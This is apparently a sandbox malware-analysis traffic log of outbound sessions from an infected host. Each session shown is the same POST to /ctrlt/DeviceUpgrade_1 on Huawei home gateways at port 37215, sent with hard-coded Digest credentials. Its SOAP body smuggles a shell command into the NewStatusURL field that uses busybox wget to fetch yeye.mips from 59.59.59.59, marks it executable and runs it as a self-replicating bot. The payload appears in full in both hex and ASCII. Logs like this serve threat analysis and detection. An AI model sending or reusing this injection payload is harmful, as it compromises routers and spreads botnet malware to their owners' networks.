                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:02.009531975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:05.657485008 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1052192.168.2.1554686197.234.2.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.716731071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:58.745651960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1053192.168.2.153512441.46.160.25337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.716778994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1054192.168.2.1560748168.104.108.7337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.716809988 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1055192.168.2.1555526157.76.28.637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.716845036 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1056192.168.2.1535324122.76.0.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.716873884 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1057192.168.2.1547384197.222.74.21237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.716897011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1058192.168.2.1549418197.133.164.6937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.716909885 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1059192.168.2.1558056157.124.3.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.717116117 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
